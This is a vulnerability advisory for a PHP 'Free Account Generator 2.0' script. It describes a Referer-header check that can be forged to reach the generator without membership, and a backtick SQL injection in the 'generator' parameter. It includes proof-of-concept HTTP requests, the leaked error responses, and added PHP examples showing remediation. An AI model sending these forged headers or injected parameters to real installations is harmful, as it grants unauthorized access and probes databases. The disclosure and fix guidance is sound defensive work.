- ==============================================================================================
- [-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
- [-] Author => DigiGang (digitalgangster@lelantos.org)
- [-] Date Release => 22 August, 2016
- [-] Vendor => HackForums, froy0z
- Title => Free Account Generator 2.0
- Thread Post => http://hackforums.net/showthread.php?tid=4882268
- Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
- Vulnerable Version => 2.0
- Tested Version => Latest, 2.0 on a Wamp Server
- ==============================================================================================
- Vulnerability #1 : Using the generator without registering or purchasing a membership.
- Vuln File: /lib/generate.php
- Vuln Code: Line 3-6
- /*********************************************************************************
- 3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
- 4. if($pos===false){
- 5. die('No Access');
- 6. }
- *********************************************************************************/
- The check only tests whether the value of HTTP_HOST occurs somewhere inside the Referer header (strpos returns false only when it does not). The Referer is supplied by the client, so anyone can send one that contains the hostname and reach the generator without an account or membership; the script never consults any session or login state.
- [-] Proof Of Concept [-]
- http://localhost/lib/generate.php?generator=1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- If-None-Match: 1
- Upgrade-Insecure-Requests: 1
- Response:
- No Access
- [bypass]
- http://localhost/lib/generate.php?generator=1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1
- Connection: keep-alive
- If-None-Match: 1
- Upgrade-Insecure-Requests: 1
- Response:
- test@account.com:123123
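- The following is an added example, not code from FAG 2.0: it reproduces the Referer test from lines 3-6 of /lib/generate.php against constructed header values, then shows an access check based on session state that a client cannot satisfy by editing a header. The hostname and the session keys (`user_id`, `is_member`) are assumptions for the example.

```php
<?php
// Added example, not code from FAG 2.0: reproduces the Referer check from
// /lib/generate.php lines 3-6 against constructed header values, then shows
// an access check that the client cannot satisfy by editing a header.

// Same test as generate.php: passes whenever HTTP_HOST appears anywhere in
// the Referer. Both arguments are strings taken from the request.
function referer_check(string $referer, string $host): bool
{
    return strpos($referer, $host) !== false;
}

$host = 'localhost'; // stands in for getenv('HTTP_HOST') on the test box

// Constructed Referer values an attacker might send; expected result in the comment.
$referers = [
    '',                                      // no header -> "No Access"
    'http://localhost/lib/generate.php',     // the bypass from the PoC -> allowed
    'http://attacker.example/?q=localhost',  // host only as a substring -> still allowed
];
foreach ($referers as $referer) {
    printf("%-40s %s\n", var_export($referer, true),
        referer_check($referer, $host) ? 'allowed' : 'No Access');
}

// Replacement: decide on server-side session state set at login, never on a
// request header. The session keys are assumptions for this example; the real
// login code would set whatever it uses. Call this before any generator logic.
function require_member(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['user_id']) || empty($_SESSION['is_member'])) {
        http_response_code(403);
        exit('No Access');
    }
}
```

- Note that the substring test also passes for a Referer that merely contains the hostname in its query string, so even a stricter parse of the header would not turn it into an authorization check; the header is informational and browsers may omit it entirely (e.g. under a `no-referrer` policy), which would lock out legitimate users while doing nothing against an attacker.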
- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Vulnerability #2 : SQL Injection
- Vuln File: /lib/generate.php
- Vuln Code: Line 10 & 34-40
- /******************************************************************************************************************************************************************
- 10. $generator = mysqli_real_escape_string($con, $_GET['generator']);
- 34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
- 35. if(mysqli_num_rows($result) < 1){
- 36. exit("0 Accounts in stock");
- 37. }
- 38. while($row = mysqli_fetch_array($result)){
- 39. echo $row['alt'];
- 40. }
- ******************************************************************************************************************************************************************/
- mysqli_real_escape_string() on line 10 escapes quotes, backslashes and a few control characters, but not the backtick. Line 34 then interpolates the value into a backtick-quoted table name, so a backtick in the 'generator' parameter closes the identifier and everything after it is parsed as SQL. Because the script calls die(mysqli_error($con)), the DBMS error text is returned to the client, as the responses below show.
- [-] Proof Of Concept [-]
- http://localhost/lib/generate.php?generator=1+3
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1+3
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
- If-None-Match: 1
- Response:
- Table 'FAG_2sql1.generator1 3' doesn't exist
- http://localhost/lib/generate.php?generator=1`+TEST
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://localhost/lib/generate.php?generator=1`+TEST
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
- If-None-Match: 1
- Response:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1
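- The following is an added example, not code from FAG 2.0: it builds the statement from line 34 of /lib/generate.php the way the script does (with addcslashes() standing in for mysqli_real_escape_string() so no database connection is needed) to show that escaping the value leaves the backtick-quoted identifier unprotected, and then a lookup that validates the generator number instead of escaping it. The allowlist of generator numbers is a constructed assumption.

```php
<?php
// Added example, not code from FAG 2.0: builds the statement from line 34 of
// /lib/generate.php the way the script does, to show that escaping the value
// does not protect a backtick-quoted identifier, then a version that validates
// the generator number instead of escaping it.

// mysqli_real_escape_string() escapes NUL, \n, \r, \, ', " and Ctrl-Z.
// The backtick is not in that set. addcslashes() with the same set is used
// here so the example runs without a database connection.
function escape_like_mysqli(string $value): string
{
    return addcslashes($value, "\x00\n\r\\'\"\x1a");
}

// What generate.php executes: the escaped value lands inside `generator...`.
function vulnerable_query(string $generator): string
{
    $g = escape_like_mysqli($generator);
    return "SELECT * FROM `generator$g` WHERE `status` != '0' ORDER BY RAND() LIMIT 1";
}

// Safer lookup: the suffix is an integer the application created, so accept
// only digits and only numbers that correspond to an existing generator.
// $known is a constructed allowlist; a real deployment derives it from the
// generators it actually configured. Returns null when the input is rejected,
// so nothing reaches the DBMS.
function safe_query(string $generator, array $known): ?string
{
    if (!ctype_digit($generator) || !in_array((int) $generator, $known, true)) {
        return null;
    }
    $table = 'generator' . (int) $generator;
    return "SELECT `alt` FROM `$table` WHERE `status` != '0' ORDER BY RAND() LIMIT 1";
}

$known = [1, 2]; // constructed: generators that exist on this install
foreach (['1', '1 3', '1` TEST'] as $input) {
    echo "input:    ", var_export($input, true), "\n";
    echo "  as built: ", vulnerable_query($input), "\n";
    echo "  hardened: ", safe_query($input, $known) ?? 'rejected', "\n";
}
```

- For the two PoC inputs the "as built" line reproduces exactly the statements behind the error messages above: `generator1 3` as a non-existent table, and `generator1` TEST` WHERE ...` as the syntax error near '` WHERE `status`'. Identifiers cannot be bound as prepared-statement parameters, which is why the fix is an allowlist on the number rather than escaping; the `die(mysqli_error($con))` should also be replaced by logging server-side and returning a generic error, so that the DBMS stops acting as an oracle for the attacker.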